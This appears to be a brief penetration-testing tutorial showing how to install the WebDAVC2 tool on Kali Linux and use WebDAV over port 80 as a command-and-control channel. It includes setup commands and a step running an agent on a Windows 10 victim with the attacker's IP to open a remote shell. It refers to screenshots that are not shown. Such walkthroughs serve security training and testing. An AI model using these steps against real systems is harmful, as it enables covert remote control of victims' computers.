WebDAV(Web Distributed Authoring and Versioning) is the extended framework of HTTP protocol which includes more features such as clients can connect to the web server and perform actions like a modification of files on the web server.
It works on port 80 and 443.So we can use web server ports as command and control channel to obtain the shell.To perform this attack download the WebDAVC2 tool Here.
Here I have used Kali Linux(Attacker Machine) and Victim Machine (Windows 10)
Installation & Configuration
Git clone this repository:
- root@kali:~# git clone https://github.com/Arno0x/WebDAVC2
Change directory into the WebDavC2 folder:
- root@kali:~# cd WebDAVC2
Give the execution permission to the script:
- root@kali:~# chmod +x webDavC2.py
ATTACKER MACHINE – WebDAV
- Run the tool and provide the remote web server IP.Here I have given Windows 10 machine IP address.
- Above Image shows scripts is actively looking for port 80, once the client is connected we should get the shell.
- Open the agent.exe executable in cmd of windows 10 machine.
- Run CMD and Execute the command:agent.exe <Attackers IP> as the listener.
- Above figure shows victim agent is connected to attackers IP.
BACK TO ATTACKERS MACHINE
- Once the Listener is executed on my windows 10 victim machine, Here we got a shell with port 80.
- Let us try some windows commands to control of victim pc.
- Above figures show Windows 10 is accessible via port 80 on attackers machine.
NOTE: This script uses PROPFIND feature of WebDev used to retrieve remote system.
Therefore WebDev can be used as the C2 communication channel to maintain access to victim machine or delivering malicious payloads.Happy Hacking !!!